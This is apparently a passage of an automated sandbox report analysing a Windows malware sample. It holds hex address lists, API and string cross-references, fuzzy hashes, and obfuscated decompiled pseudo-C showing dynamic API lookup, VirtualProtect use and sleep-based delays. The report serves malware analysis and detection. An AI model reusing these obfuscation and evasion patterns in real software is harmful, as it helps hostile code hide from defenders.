0x004b8e38
0x004b8e3a
0x004b8e3b
0x004b8e3e
0x004b8e47
0x004b8e4e
0x004b8e57
0x004b8e5c
0x004b8e6a
0x004b8e71
0x004b8e71
0x004b8e71
0x004b8e73
0x004b8e75
0x004b8e7a
0x004b8e7c
0x004b8e7c
0x004b8e92
0x004b8e98
0x004b8e9f
0x004b8ea0
0x004b8ea6
0x004b8eaa
0x004b8eab
0x004b8ebd
0x004b8ec3
0x004b8ee0
0x004b8eeb
0x004b8ef1
0x004b8f03
0x004b8f0a
0x004b8f17
0x004b8f18
0x004b8f1c
0x004b8f21
0x004b8f23
0x004b8f25
0x004b8f25
0x004b8f2b
0x004b8f32
0x004b8f33
0x004b8f38
0x004b8f3b
0x004b8f40
0x004b8f51
0x004b8f54
0x004b8f9b
0x004b8f9b
0x004b8f56
0x004b8f61
0x004b8f6e
0x004b8f77
0x004b8f7e
0x004b8f84
0x004b8f87
0x004b8f8d
0x004b8f93
0x004b8f95
0x00000000
0x004b8f95
0x004b8f8d
0x004b8fa1
0x004b8fb5
0x004b8fb8
0x004b8fbb
0x004b8fbc
0x004b80e1
0x004b80e4
0x004b80e9
0x004b80ec
0x004b80ee
0x004b80f3
0x004b80f3
0x004b80fe
0x004b8108
0x004b8108
0x004b811f
0x004b8125
0x004b812b
0x004b8131
0x004b8147
0x004b814d
0x004b8151
0x004b8153
0x004b8153
0x004b8163
0x004b8164
0x004b8178
0x004b8186
0x004b8189
0x004b818a
0x004b81a2
0x004b81a7
0x004b81ae
0x004b81c6
0x004b81cc
0x004b81d2
0x004b81d6
0x004b81d7
0x004b81da
0x004b81df
0x004b81e5
0x004b81ec
0x004b81f1
0x004b81f4
0x004b81fd
0x004b824f
0x004b824f
0x004b8257
0x004b826b
0x004b826b
0x004b8270
0x004b8283
0x004b828c
0x004b8296
0x004b829b
0x004b82a0
0x004b82ae
0x004b8311
0x004b8317
0x004b8317
0x004b831e
0x004b831f
0x004b8324
0x004b8333
0x004b833e
0x004b8344
0x004b8349
0x004b834f
0x004b8352
0x004b8366
0x004b8377
0x004b8385
0x004b8391
0x004b8392
0x004b8393
0x004b8394
0x004b8395
0x004b8398
0x004b8398
0x004b83a3
0x004b83ac
0x004b83b3
0x004b83b4
0x004b83ba
0x004b83c3
0x004b83c8
0x004b83ce
0x004b83e0
0x004b83ee
0x004b83ef
0x004b83f6
0x004b8405
0x004b8407
0x004b840b
0x004b8422
0x004b8429
0x004b843f
0x004b8447
0x004b8448
0x004b844f
0x004b8459
0x004b845d
0x004b846b
0x004b8470
0x004b8473
0x004b8476
0x004b8477
0x004b8478
0x004b847d
0x004b8481
0x004b8488
0x004b8492
0x004b84a3
0x004b84aa
0x004b84b0
0x004b84b6
0x004b84c6
0x004b84d0
0x004b84d5
0x004b84de
0x004b84e5
0x004b84e7
0x004b84e7
0x004b84ee
0x004b84fa
0x004b84fa
0x004b84de
0x004b8488
0x004b8500
0x004b8509
0x004b850e
0x004b850e
0x004b8514
0x004b8524
0x004b8527
0x004b8531
0x004b8534
0x004b853c
0x004b854a
0x004b854d
0x004b855b
0x004b855e
0x004b856b
0x00000000
0x00000000
0x004b856d
0x004b8575
0x004b857b
0x004b858e
0x004b85cd
0x004b85cd
0x004b85d9
0x004b85df
0x004b862c
0x004b8642
0x004b8643
0x004b8646
0x004b8669
0x004b867a
0x004b867f
0x004b8681
0x004b868b
0x004b868c
0x004b8691
0x004b86a2
0x004b86a6
0x004b86a7
0x004b86ac
0x004b8712
0x004b8715
0x004b8718
0x004b871b
0x004b871d
0x004b871d
0x004b8722
0x004b8724
0x004b872b
0x004b872b
0x004b872b
0x004b872c
0x004b8734
0x004b873e
0x004b873f
0x004b8742
0x004b874a
0x004b874f
0x004b875d
0x004b8763
0x004b8770
0x004b8771
0x004b8785
0x004b8794
0x004b87a2
0x004b87a5
0x004b87b6
0x004b87b7
0x004b87b8
0x004b87b9
0x004b87c4
0x004b87c4
0x004b86b3
0x004b86c2
0x004b86c8
0x004b86ca
0x004b86ce
0x004b86d0
0x004b86d5
0x004b86e4
0x004b86eb
0x004b86eb
0x004b86eb
0x004b86f0
0x004b86f5
0x004b86fc
0x004b8708
0x004b870a
0x00000000
0x004b870c
0x004b870c
0x00000000
0x004b870c
0x004b870a
0x004b8651
0x004b8654
0x00000000
0x00000000
0x004b8667
0x00000000
0x004b8667
0x004b85e3
0x004b8603
0x004b8609
0x004b8609
0x004b8612
0x004b8618
0x004b861f
0x004b8626
0x00000000
0x004b8626
0x004b85ef
0x00000000
0x00000000
0x004b85f8
0x004b85fd
0x00000000
0x004b859c
0x004b85a4
0x004b85a9
0x004b85b3
0x004b85ba
0x004b85c9
0x00000000
0x004b85c9
0x004b8534
0x004b82c5
0x004b82cf
0x004b82e3
0x004b82e9
0x004b82ef
0x004b82f1
0x004b82f1
0x004b8302
0x00000000
0x004b8304
0x004b830e
0x00000000
0x004b830e
0x004b8302
0x004b8285
0x004b8285
0x00000000
0x004b8285
0x004b8260
0x00000000
0x00000000
0x004b8265
0x00000000
0x004b8265
0x004b820a
0x004b8214
0x004b821d
0x00000000
0x00000000
0x004b8221
0x004b822a
0x004b823c
0x004b824a
0x00000000
0x004b824a
0x004b8fc4
0x004b8fc6

APIs

GetProcAddress.KERNEL32(?,?), ref: 004B8C8B

Strings

MXEAgent.dll, xrefs: 004B8C20
speechuxcpl.dll, xrefs: 004B8B82
"57, xrefs: 004B8C1B
b=$, xrefs: 004B8B8F
api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 004B8D82
TpWaitForAlpcCompletion, xrefs: 004B8C55
LogonUserExA, xrefs: 004B8BE5
CNBBR334.DLL, xrefs: 004B8D21

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: "57$CNBBR334.DLL$LogonUserExA$MXEAgent.dll$TpWaitForAlpcCompletion$api-ms-win-core-libraryloader-l1-1-0.dll$b=$$speechuxcpl.dll
API String ID: 190572456-4259513945
Opcode ID: d1f989819c1dba9aa401ea89ee53a303ac767853050672fe437326be1e75ca8d
Instruction ID: f656ac22c5e77faabc582cae83f898c02ee6b858cd7439dc3d3c220c41db44fc
Opcode Fuzzy Hash: d1f989819c1dba9aa401ea89ee53a303ac767853050672fe437326be1e75ca8d
Instruction Fuzzy Hash: 2551D466E08240CFC7019F79FC846E93BB6EF6B324708417BC95497362D6294A29C7BD

Uniqueness

Uniqueness Score: -1.00%

Function 004C2BD5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 139registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 004C2BE7

Strings

pf!, xrefs: 004C33C9
ehshell.dll, xrefs: 004C3317
speechuxcpl.dll, xrefs: 004C3308
MXEAgent.dll, xrefs: 004C2C1C, 004C2C3B
api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 004C3EE2
Microsoft.Build.Engine.dll, xrefs: 004C33B3
EhStorAuthn.exe, xrefs: 004C2BFB
RegQueryInfoKeyW, xrefs: 004C3EF8

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: Create
String ID: EhStorAuthn.exe$MXEAgent.dll$Microsoft.Build.Engine.dll$RegQueryInfoKeyW$api-ms-win-core-libraryloader-l1-1-0.dll$ehshell.dll$pf!$speechuxcpl.dll
API String ID: 2289755597-1519561078
Opcode ID: a18306fad331479b73c3ce149f694c3f30114445ca51dd2093596d7cda0461a5
Instruction ID: 0392f961b300e47920d5d3a3f7ba93c64aeb95c3cba51f0a254cc240335b6c4a
Opcode Fuzzy Hash: a18306fad331479b73c3ce149f694c3f30114445ca51dd2093596d7cda0461a5
Instruction Fuzzy Hash: 06519079F00349AFCB00DFB9E8C0ADDBFB1EB2A315F4481BA995497312D2744A55CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004D332C Relevance: 15.2, APIs: 1, Strings: 9, Instructions: 164
sleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004D332C(void* __ebx, signed short __edx, void* __edi, signed int __esi) {
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				char _t50;
				intOrPtr _t57;
				intOrPtr _t62;
				intOrPtr _t90;
				signed short _t123;
				signed int _t128;
				signed short _t136;
				short _t138;
				void* _t151;
				signed int _t154;
				signed short _t155;
				void* _t160;

				_t154 = __esi;
				_t151 = __edi;
				_t136 = __edx;
				if(__ebx < 0x2a07) {
					 *0x4fd0d2 =  *0x4fd0d2 - __bx;
					__ebx =  *((intOrPtr*)(__ebp - 0x20));
				}
				_t123 =  *0x4fd11a; // 0x7c
				_t46 =  *((intOrPtr*)(_t160 - 8));
				if((_t123 & 0x000080c2) > 0 && (_t136 & 0x00009086) <= 0) {
					 *0x4fff18 =  *0x4fff18 + _t136;
				}
				_t155 = _t154 ^ 0x009de848;
				 *((intOrPtr*)(_t160 - 8)) = _t46;
				_t48 =  *((intOrPtr*)(_t160 - 8));
				if( *((intOrPtr*)(_t160 - 0x68)) > 0x78) {
					_t138 =  *0x4fd1e6; // 0x8656
					 *((intOrPtr*)(_t160 - 8)) = _t48;
					_push(E004D3400);
					_t50 = E004ABBC5;
					goto __eax;
				}
				if(_t123 == _t123) {
					 *0x4fff17 =  *0x4fff17 + _t136;
					 *0x4fd1da =  *0x4fd1da + _t136;
				}
				_t138 = _t136 + _t136 + 0xae;
				_t155 = _t155 & 0x00aedc6a;
				 *0x4fd71f =  *0x4fd71f + _t151;
				 *((intOrPtr*)(_t160 - 8)) = _t48;
				_t50 =  *((intOrPtr*)(_t160 - 8));
				if( *0x4fff13 == 0) {
					 *(_t160 - 0x24) = _t123;
					 *((intOrPtr*)(_t160 - 8)) = _t50;
					_push(0x3e8);
					 *0x4fff14 =  *0x4fff14 - 0x3fae76;
					_push(0x4d3261);
					_push(L004F8FDE);
					return  *((intOrPtr*)(_t160 - 8));
				} else {
					 *((intOrPtr*)(_t160 - 0xc)) = _t50;
					_t90 = "speechuxcpl.dll" + _t50 + 0x28;
					 *0x4fff12 =  *0x4fff12 + _t90;
					if(_t90 < _t90) {
						L19:
						_t128 = _t123 + 0x725df9;
						 *0x4fd1cc = _t138;
					} else {
						_t128 =  *(_t160 - 0x20);
						 *0x4fd162 = _t128;
						 *0x4fd17e = _t128;
						_t138 = _t138 - 0x78805c + 1;
						 *0x4fd1fa =  *0x4fd1fa + _t138;
						if((_t155 & 0x0000b5aa) > 0) {
							 *0x4fff1b = _t50;
							_t90 =  *0x4fff1d; // 0x1
						}
						if(_t50 < 0x249521) {
							_t123 = _t128 + _t128;
							goto L19;
						}
					}
					 *0x4fff19 = _t50;
					 *0x4fff1b = _t50;
					 *0x4fd21c = 0x9055;
					 *((intOrPtr*)(_t160 - 8)) = _t50;
					_t57 =  *((intOrPtr*)(_t160 - 8));
					 *((intOrPtr*)(_t160 - 0x14)) = _t50 - 0xcb;
					 *0x4fff15 =  *0x4fff15 - (_t128 ^ 0x00000082);
					 *0x4fd1d2 =  *0x4fd1d2 - 0x897d;
					Sleep(0x381);
					 *((intOrPtr*)(_t160 - 8)) = _t57;
					if("RtlSecondsSince1970ToTime" < 0x26e196) {
						 *0x4fd108 =  *0x4fd108 -  *((intOrPtr*)(_t160 - 0x14)) - 0x4301;
						 *0x4fd220 =  *0x4fd220;
						 *0x4fff1d =  *0x4fff1d + 0xd4;
					}
					 *(_t160 - 0x18) = "RegQueryInfoKeyW";
					_t62 =  *((intOrPtr*)(_t160 - 8));
					 *((intOrPtr*)(_t160 - 8)) = _t62;
					if(_t62 >= 0x17) {
					}
					_t45 =  *((intOrPtr*)(_t160 - 8));
					 *0x4fd178 = 0x4fd110;
					if( *0x4fff13 == 0) {
						 *((intOrPtr*)(_t160 - 8)) = _t45;
						 *((intOrPtr*)(_t160 - 0x10)) = 0x1e39e6;
						_push(E004D26F8);
						_push(E004B9910);
						return  *((intOrPtr*)(_t160 - 8));
					} else {
						return _t45;
					}
				}
			}

0x004d332c
0x004d332c
0x004d332c
0x004d3331
0x004d3333
0x004d333a
0x004d333a
0x004d333d
0x004d3344
0x004d334f
0x004d3358
0x004d3358
0x004d335e
0x004d3368
0x004d336f
0x004d3384
0x004d33ea
0x004d33f1
0x004d33f4
0x004d33f9
0x004d33fe
0x004d33fe
0x004d338b
0x004d338d
0x004d3393
0x004d3393
0x004d339c
0x004d33a1
0x004d33b1
0x004d33c2
0x004d33cd
0x004d33dc
0x004d3200
0x004d3210
0x004d3229
0x004d3244
0x004d3256
0x004d325b
0x004d3260
0x004d33e2
0x004d351a
0x004d3520
0x004d3523
0x004d352b
0x004d358a
0x004d358a
0x004d3590
0x004d352f
0x004d352f
0x004d3532
0x004d3539
0x004d3546
0x004d3547
0x004d3556
0x004d3558
0x004d3560
0x004d3560
0x004d3575
0x004d3587
0x00000000
0x004d3587
0x004d3575
0x004d35a1
0x004d35a7
0x004d35c1
0x004d35d0
0x004d35d7
0x004d35da
0x004d35e7
0x004d35fa
0x004d360a
0x004d3611
0x004d361e
0x004d3628
0x004d3647
0x004d3656
0x004d3656
0x004d366f
0x004d367e
0x004d3684
0x004d3689
0x004d3689
0x004d36a0
0x004d36a3
0x004d36b1
0x004d26da
0x004d26e2
0x004d26ed
0x004d26f2
0x004d26f7
0x004d36b7
0x004d36b8
0x004d36b8
0x004d36b1

APIs

Sleep.KERNEL32(0000031A), ref: 004D360A

Strings

psapi.dll, xrefs: 004D3675
MXEAgent.dll, xrefs: 004D33D0
speechuxcpl.dll, xrefs: 004D3515
x, xrefs: 004D3380
RtlSecondsSince1970ToTime, xrefs: 004D3614
deskperf.dll, xrefs: 004D3693
scavengeui.dll, xrefs: 004D3582
EhStorAuthn.exe, xrefs: 004D3372
RegQueryInfoKeyW, xrefs: 004D366A

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: Sleep
String ID: EhStorAuthn.exe$MXEAgent.dll$RegQueryInfoKeyW$RtlSecondsSince1970ToTime$deskperf.dll$psapi.dll$scavengeui.dll$speechuxcpl.dll$x
API String ID: 3472027048-2267566015
Opcode ID: dcfc35d9306008336a600f0b888f4312bbf25661d33c9f5608af04e967dca0fb
Instruction ID: d1398c7f338e7811775efde22b4eb232f92baa9e2cd95f4ce7ca777bd5036ab0
Opcode Fuzzy Hash: dcfc35d9306008336a600f0b888f4312bbf25661d33c9f5608af04e967dca0fb
Instruction Fuzzy Hash: 1951E265E043459FCB00DFB8E9A46ED7BB1EB2A310F08417BCA4197366E3780A55C769

Uniqueness

Uniqueness Score: -1.00%

Function 004E9ACA Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 285memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?), ref: 004E9BA4

Strings

psapi.dll, xrefs: 004E9C4E
MXEAgent.dll, xrefs: 004E9B1C
`gqt, xrefs: 004E9BA4
Microsoft.Build.Engine.dll, xrefs: 004E9D3E
EhStorAuthn.exe, xrefs: 004E9CD1
user.exe, xrefs: 004E9B0F
disrvpp.dll, xrefs: 004E9E17

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: ProtectVirtual
String ID: EhStorAuthn.exe$MXEAgent.dll$Microsoft.Build.Engine.dll$`gqt$disrvpp.dll$psapi.dll$user.exe
API String ID: 544645111-326403573
Opcode ID: 9aaa832b8986155b637cfd2ee9bab3d01e02b6e5e00e3467393fc4e4aef9fae9
Instruction ID: 6d40c07885e3ca9245fd16bbb72ef086c160632dd052a45aeccf908f84089718
Opcode Fuzzy Hash: 9aaa832b8986155b637cfd2ee9bab3d01e02b6e5e00e3467393fc4e4aef9fae9
Instruction Fuzzy Hash: C3A1F566E482818FC700CF79FC446E97BB2EF7A714B04417BD844973A6E2384A56C7AC

Uniqueness

Uniqueness Score: -1.00%

Function 004B60F5 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 203
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E004B60F5(void* __eax, void* __ecx, signed int __edx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _t51;
				_Unknown_base(*)()* _t58;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t61;
				_Unknown_base(*)()* _t64;
				_Unknown_base(*)()* _t67;
				_Unknown_base(*)()* _t68;
				_Unknown_base(*)()* _t74;
				_Unknown_base(*)()* _t78;
				intOrPtr _t82;
				void* _t85;
				_Unknown_base(*)()* _t90;
				_Unknown_base(*)()* _t94;
				char* _t96;
				void* _t121;
				unsigned short _t122;
				short _t124;
				signed int _t127;
				void* _t129;
				signed int _t138;
				void* _t147;
				void* _t148;
				void* _t150;
				_Unknown_base(*)()* _t151;
				struct HINSTANCE__* _t152;
				void* _t155;

				_t150 = __esi;
				_t147 = __edi;
				_t138 = __edx;
				_t121 = __ecx;
				_t51 =  *(_t155 - 8);
				_push( *0x4fd1a8);
				_t85 = 0x41850a;
				 *(_t155 - 8) = _t51;
				if(_t51 < 0x18075b) {
					 *((intOrPtr*)(_t155 - 0x1c)) = 0x2d3e22;
					_t85 = 0;
				}
				_t122 = _t121 - 0x63;
				 *0x4fd186 = _t122;
				 *(_t155 - 8) = E004F4B5F(_t85, _t122, _t138, 0);
				 *(_t155 - 0x10) = "psapi.dll";
				_t55 =  *(_t155 - 8);
				_t124 = _t122 >> _t122;
				_t58 = L0049EEB0( *(_t155 - 8) + _t55 +  *(_t155 - 8) + _t55, _t124, _t138, _t147, _t150);
				if(0xd5 != 0x2e) {
					 *((intOrPtr*)(_t155 - 0x18)) = 0xd5;
					 *0x4fd15c = _t124;
					_t124 = 0xffffffffffffff82;
					 *0x4fd1c2 =  *0x4fd1c2 - _t138;
					 *0x4fd1de = _t138;
					if((_t138 & 0x008bfb1c) <= 0) {
						L5:
						 *(_t155 - 0x10) = "mssip32.dll";
					} else {
						_t138 = _t138 - 0xabd8;
						 *0x4ff4b3 =  *0x4ff4b3 - _t150;
						 *0x4fff1b = _t58;
						_t82 =  *0x4fff1d; // 0x1
						_t58 = _t82 - 0xe7;
						if(_t147 < 0) {
							goto L5;
						}
					}
				}
				_t59 =  *(_t155 - 8);
				_t90 = _t59;
				_t151 = _t90;
				 *0x4fd1fc = _t138;
				_t148 = _t147 - 0xaa23e4;
				_push(_t151);
				 *0x4fff1b = _t59;
				if(_t148 <= 0) {
					L10:
					_t90 = 0x481424;
					 *((intOrPtr*)(_t155 - 0x20)) = _t124;
					_t124 = 0x77ca;
				} else {
					_t148 = _t148 - 0xe520;
					if(_t148 <= 0) {
						goto L10;
					}
				}
				_pop(_t152);
				 *(_t155 - 0x5c) = _t152;
				_t94 = _t90;
				_push( *(_t155 - 0x5c));
				 *(_t155 - 8) = _t59;
				_t61 =  *(_t155 - 8);
				_push( *((intOrPtr*)(_t155 - 0x58)));
				_t127 =  *0x4fd18e; // 0xf0ad
				 *0x4fd1da = _t151;
				 *0x4fff19 =  *0x4fff19 + _t61;
				if(_t152 >= 0) {
					_t148 = _t148 + _t152;
					 *0x4fff1e = _t61;
					_t94 = _t61;
				}
				 *(_t155 - 8) = _t61;
				_t64 = GetProcAddress(_t152, ??);
				 *0x4fff18 =  *0x4fff18 - 0x999c79;
				 *(_t155 - 8) = _t64;
				 *(_t155 - 0x14) = _t94;
				_t96 =  *((intOrPtr*)(_t155 - 0x18)) - 0x407eb9;
				_t67 =  *(_t155 - 8);
				_t129 =  !_t127 +  !_t127;
				if(_t129 >= _t129) {
					_t129 = _t129 - 0x7f1a;
					 *0x4fd1b2 = 0x999c79;
					 *0x4fd1cc = 0x999c79;
				}
				 *(_t155 - 8) = _t67;
				if(_t67 <= 0x19a6) {
					if(_t67 < 0x25258f) {
						_t96 = "ehshell.dll";
					}
					_t96 =  &(( &(_t96[_t96]))[_t129]);
				}
				 *((intOrPtr*)(_t155 - 0x2c)) =  *((intOrPtr*)(_t155 - 0x2c)) + 0x7060;
				_t68 =  *(_t155 - 8);
				if(_t68 != 0) {
					 *(_t155 - 8) = _t68;
					E004B525F(_t68, _t96, 0xffffffffffff956b, _t68, 0, _t68);
					 *((intOrPtr*)(_t155 - 0x20)) = 0xffffffffffff956b;
					_t74 =  *(_t155 - 8);
					 *0x4feecb = _t74;
					 *0x4fff17 =  *0x4fff17 - 0x999c79;
					 *0x4fff19 = _t74;
					 *0x4fff1b = _t74;
					 *0x4ffac8 =  *0x4ffac8 - _t148;
					 *0x4ffbec =  *0x4ffbec + _t148;
					if(0 < 1) {
						 *0x4fd036 =  *0x4fd036 + _t74;
					}
					 *(_t155 - 8) = _t74;
					 *0x4fd0a0 =  *0x4fd0a0 +  *(_t155 - 0x14);
					_t78 =  *(_t155 + 8);
					 *(_t155 - 8) = _t78;
					_push(_t78);
					_push(0x4b63d4);
					_t68 = E004AB557;
					goto __eax;
				}
				return _t68;
			}

0x004b60f5
0x004b60f5
0x004b60f5
0x004b60f5
0x004b60ff
0x004b6102
0x004b6109
0x004b610e
0x004b6116
0x004b6126
0x004b6129
0x004b6129
0x004b612c
0x004b6132
0x004b6143
0x004b614b
0x004b6154
0x004b615a
0x004b6164
0x004b616c
0x004b616e
0x004b6178
0x004b6181
0x004b6184
0x004b618b
0x004b6198
0x004b61bb
0x004b61c7
0x004b619a
0x004b619a
0x004b619f
0x004b61a5
0x004b61ad
0x004b61b3
0x004b61b9
0x00000000
0x00000000
0x004b61b9
0x004b61ca
0x004b61d2
0x004b61d5
0x004b61d7
0x004b61d9
0x004b61e7
0x004b61ed
0x004b61ee
0x004b61f7
0x004b620d
0x004b6218
0x004b621d
0x004b622a
0x004b61f9
0x004b61f9
0x004b6200
0x00000000
0x004b6208
0x004b6200
0x004b623c
0x004b623d
0x004b6240
0x004b6242
0x004b6245
0x004b624a
0x004b624d
0x004b6255
0x004b625c
0x004b626b
0x004b6273
0x004b6275
0x004b6280
0x004b6285
0x004b6285
0x004b6287
0x004b6296
0x004b629c
0x004b62a5
0x004b62af
0x004b62b5
0x004b62bb
0x004b62c0
0x004b62c4
0x004b62c6
0x004b62cb
0x004b62d2
0x004b62d2
0x004b62d9
0x004b62e0
0x004b62e7
0x004b62ee
0x004b62ee
0x004b62f5
0x004b62f7
0x004b62fc
0x004b6302
0x004b6308
0x004b6316
0x004b631d
0x004b6341
0x004b6350
0x004b6353
0x004b6358
0x004b6367
0x004b636d
0x004b637b
0x004b6381
0x004b638c
0x004b638e
0x004b638e
0x004b639e
0x004b63aa
0x004b63bb
0x004b63c4
0x004b63c7
0x004b63c8
0x004b63cd
0x004b63d2
0x004b63d2
0x004b6675

APIs

GetProcAddress.KERNEL32(?,?), ref: 004B6296

Strings

mssip32.dll, xrefs: 004B61C2
psapi.dll, xrefs: 004B6146
ehshell.dll, xrefs: 004B62EE
">-, xrefs: 004B611B
d^+, xrefs: 004B60FA
#"?, xrefs: 004B61CD
EhStorAuthn.exe, xrefs: 004B620D

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: ">-$#"?$EhStorAuthn.exe$d^+$ehshell.dll$mssip32.dll$psapi.dll
API String ID: 190572456-4025090196
Opcode ID: c85a08d428750c71164a5939202a0ab4621f8114f0e0f719f9c5997463f548ac
Instruction ID: ae206487ac64591f8cb7b35462b8d533797567fbcaca72f3fd6422bad97b3894
Opcode Fuzzy Hash: c85a08d428750c71164a5939202a0ab4621f8114f0e0f719f9c5997463f548ac
Instruction Fuzzy Hash: 7671BC75E142099FCB00DFB8E9906ED7BB2EF2A310F04417AD944E7312E3785A55CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00490D00 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 186libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 00490E89

Strings

CreateActCtxW, xrefs: 00490EDF, 00490F71
scrptadm.dll, xrefs: 00490D23, 00490E42
manage-bde.exe, xrefs: 00490DD4
KBDBGPH.DLL, xrefs: 00490DF8
q7, xrefs: 00490EA0
=*E, xrefs: 00490F8C
_1;, xrefs: 00490F2C

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: =*E$CreateActCtxW$KBDBGPH.DLL$_1;$manage-bde.exe$scrptadm.dll$q7
API String ID: 190572456-100105511
Opcode ID: 9e53ec36216ba46fa8a45609f17361825cf686227aa0bc26c4aca21275eabfc2
Instruction ID: c3636f3189f636bdcb73c0e218f1a3a934c0b818f04f812c083ce88a37bc6357
Opcode Fuzzy Hash: 9e53ec36216ba46fa8a45609f17361825cf686227aa0bc26c4aca21275eabfc2
Instruction Fuzzy Hash: 5C61DD75E143469FCB009FB8E8946ED7FB1EF2A320B04817BC9449B726E2781659CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0047A807 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 182
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0047A807() {
				signed char _t36;
				signed char _t39;
				signed char _t41;
				signed char _t42;
				void* _t44;
				intOrPtr _t48;
				signed int _t53;
				intOrPtr _t79;
				signed int _t96;
				signed int _t98;
				void* _t101;
				short _t104;
				void* _t108;
				signed short _t112;
				void* _t118;
				signed int _t120;
				void* _t121;
				void* _t123;
				void* _t124;
				void* _t128;

				_t53 =  *0x4fdda3; // 0x361bbe
				_push( *0x4fd032);
				 *(_t128 - 8) = _t53;
				 *0x4fdb9b =  !_t53;
				_push( *0x4fd15e);
				_t58 = "TpWaitForAlpcCompletion" +  !0x64ca;
				_t129 = "TpWaitForAlpcCompletion" +  !0x64ca - _t58;
				if("TpWaitForAlpcCompletion" +  !0x64ca > _t58) {
					_t58 = 0x4fd100;
				}
				 *0x4fd14e =  !0x64ca;
				_t96 =  *0x4fd180; // 0x4a7e
				_t112 =  *0x4fd19a; // 0x8f85
				 *0x4fff17 =  *0x4fff17 - _t112;
				 *0x4fd1e8 =  *0x4fd1e8 + _t112;
				_t36 = E004F4B5F(_t58, _t96, _t112, _t129);
				 *0x4fd6fd =  *0x4fd6fd - _t118;
				 *(_t128 - 8) = _t36;
				_t39 =  *(_t128 - 8);
				if( !((0xdb >> _t96) + (0xdb >> _t96) + 0x4bba) ==  !((0xdb >> _t96) + (0xdb >> _t96) + 0x4bba)) {
					L4:
					_t124 = _t124 - 0xb5cfce;
					goto L5;
				} else {
					_t96 = _t112;
					_t112 = 0x9b69;
					 *0x4fd20e =  *0x4fd20e - 0x9b69;
					if((_t39 & 0x000000be) > 0) {
						L5:
						_t120 = 0;
						 *(_t128 - 0x20) = _t39;
						 *(_t128 - 8) = _t39;
						_t41 =  *(_t128 - 8);
						if(_t96 == _t96) {
							 *0x4fff15 =  *0x4fff15 + _t96;
						}
						_t98 = (_t96 & 0x0000771f) - 0x71e8d5;
						if((_t112 & 0x00800d5a) < 0) {
							 *0x4fd1e6 =  *0x4fd1e6 - _t112;
							_t112 = 0;
							 *0x4fff1b = _t41;
							_t120 = _t120 + 0xc6c3f0;
						}
						_t121 = _t120 + 1;
						 *0x4fff1e = _t41;
						_push( *(_t128 - 0x20));
						 *(_t128 - 8) = _t41;
						_t42 =  *(_t128 - 8);
						if(0x2d11fd != 0x2d11fd) {
							 *0x4fd16a = 0x618f;
							_t98 = 0;
							_t112 = _t112 + 0x8b;
							 *0x4fd204 = _t112;
							 *0x4fff1b = _t42;
							_t121 = _t121 - 0xe798;
							 *0x4fff1e = _t42;
						}
						_t101 = (_t98 & 0x00006a7d) + 0x75;
						if((_t112 & 0x00008224) >= 0) {
							_t112 = 0xa990;
							 *0x4fff19 = _t42;
						}
						_push( *0x4fd3c3);
						_t123 = _t121 - 1;
						 *(_t128 - 8) = _t42;
						_t44 = L00461400("user.exe", _t42, _t101, _t112, _t123, 0, _t42);
						if(0 != 0) {
							L16:
							_t112 = _t112 + 0xa3c4;
							if(0 >= 0) {
								 *0x4fff19 =  *0x4fff19 - _t44;
							}
							if(0 >= 0) {
								goto L21;
							} else {
								 *0x4ffcc8 =  *0x4ffcc8 + _t123;
								goto L20;
							}
						} else {
							_t108 = _t101 + 0x533ce6;
							if(_t108 != _t108) {
								L22:
								if(0 != 0x37) {
								}
								_t104 =  *0x4fd146; // 0x6f30
								 *0x4fd194 = _t104;
								 *(_t128 - 8) = GetProcAddress(??, ??);
								_t79 =  *0x4fdbe7; // 0x4f4bab
								 *0x4fff14 =  *0x4fff14 - _t79;
								 *0x4fd0fe =  *0x4fd0fe + _t79;
								_push(1);
								_push(_t104 + _t112 + _t104 + _t112);
								_push(0x47aac3);
								goto __ecx;
							}
							if(_t108 >= _t108) {
								L20:
								_t48 =  *0x4fff10; // 0x2a
								 *0x4fd060 =  *0x4fd060 + _t48 - 0x17;
								L21:
								goto L22;
							}
							goto L16;
						}
					}
					goto L4;
				}
			}

0x0047a807
0x0047a810
